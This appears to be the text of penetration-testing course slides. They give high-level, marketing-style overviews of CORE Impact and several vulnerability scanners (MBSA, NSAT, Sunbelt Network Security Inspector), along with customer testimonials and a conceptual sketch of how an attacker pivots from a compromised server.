• Commercial-grade exploits
• Innovative agent technology
• Powerful user interface
• Automation of repetitive tasks
• Complete log of all activities
• Customizable reporting
• Links to fixes


Ways to Use CORE Impact

Advanced penetration testing scenarios:

• External attacker with no previous knowledge
• Internal attacker w/access to internal network

Verification of IDS and other security controls:

• Verify external and internal taps
• Tune rule-sets to an appropriate threshold
• Reduces false-positives and increases responsiveness

Intrusion response team testing:

• Generates actual events that create a realistic intrusion

Researching new areas and technologies


Other Benefits of CORE Impact

Shortcomings of Current Penetration Testing Methodologies:

• Inefficient
  - Reliance on disparate software packages
  - Manual performance of tedious tasks
  - Inconsistent execution
• Error-prone
  - Manual logging from software to software
  - Clean-up non-existent
• Hard to scale
  - Steep learning curve
  - Labor-intensive
• Expensive

Major Benefits of CORE Impact:

• The only framework that encompasses all the Penetration Testing phases
• Complete log of all activities in a central database
• Makes the Penetration Testing practice more professional and scalable


Anatomy of a Real World Attack

Diagram: a PC loaded with CORE IMPACT, deploying agents.

• A target server is attacked and compromised; an agent is then deployed on the server.
• The acquired server is used as a vantage point to penetrate the corporate net.
• Further attacks are performed as an internal user.


Client Side Exploits

Diagram labels: agent listener, agent, workstation, attack, communication back to the console.


Tools of the Trade: CORE Impact

"It used to take me two days to replicate a network attack and see what resources were exposed - with IMPACT it now takes 20 minutes."
James Cupps, Chief Information Security Officer – Sappi Fine Paper

"IMPACT is the first commercial product that allowed us to penetrate systems and applications and show the real implication of vulnerabilities."
Bill Stevenson, Information Security Officer – New Century Financial Corporation

"We needed a way to evaluate IDS solutions and test IDS implementations. CORE IMPACT helps us do that."
Richard Taylor, Computer and Network Security Specialist – Los Alamos National Laboratory

Core Security Technologies · 46 Farnsworth St · Boston, MA 02210 · Ph: (617) 399-6980 · Fax: (617) 399-6987 · www.coresecurity.com


Impact Demo Lab

CORE Impact: Your instructor will be demonstrating this tool to exploit a vulnerable host(s) on YOUR target organization.


Microsoft Baseline Security Analyzer (MBSA)

MBSA detects common security misconfigurations and missing security updates on your computer systems.

It helps small- and medium-sized businesses to determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance.

Some of the features of MBSA are as follows:

• Scans for insecure computer configurations, local, remote, or group of computers
• Scans for common administrative vulnerabilities
• Reports updates that are not yet approved on the Update Services server
• Specifies alternate user name and password for remote administrative vulnerability scanning (as well as for security update scanning)


Microsoft Baseline Security Analyzer (MBSA) (cont'd)


Network Security Analysis Tool (NSAT)

Network Security Analysis Tool (NSAT) is a robust scanner.

It is a fast, stable bulk network security scanner designed to audit remote network services.

It is designed for:

• Keeping different kinds of wide-ranging scans stable for days.
• Performing professional-grade penetration testing and comprehensive auditing.
• Archiving full-scale vulnerability and version information easily for further purposes.
• Virtual host support, host/network exclusion support.
• Flexible and configurable scanning.
• Distributed scanning (new feature; beta status).


Network Security Analysis Tool (NSAT): Screenshot


Sunbelt Network Security Inspector (SNSI)

SNSI is licensed per Administrator, and lets you scan unlimited machines and IP addresses.

SNSI uses the latest Mitre Common Vulnerabilities and Exposures (CVE) and contains the latest SANS/FBI top 20 vulnerability list.

Following are the features of SNSI:

• It has a large number of vulnerabilities in its database
• Scans and analyzes entire domain or selected systems in the domain
• It performs frequent vulnerability database updates
• It provides a detailed report after scanning
• Performs field-based searching for vulnerabilities


Network Security Inspector: Screenshot


Summary

Common vulnerabilities have been revisited and discussed.

The anatomy of an exploit and a typical overflow has been explained.

Strengths and uses of payload generators and exploitation tools including: GDB, Metasploit, Canvas, and CORE Impact were discussed.
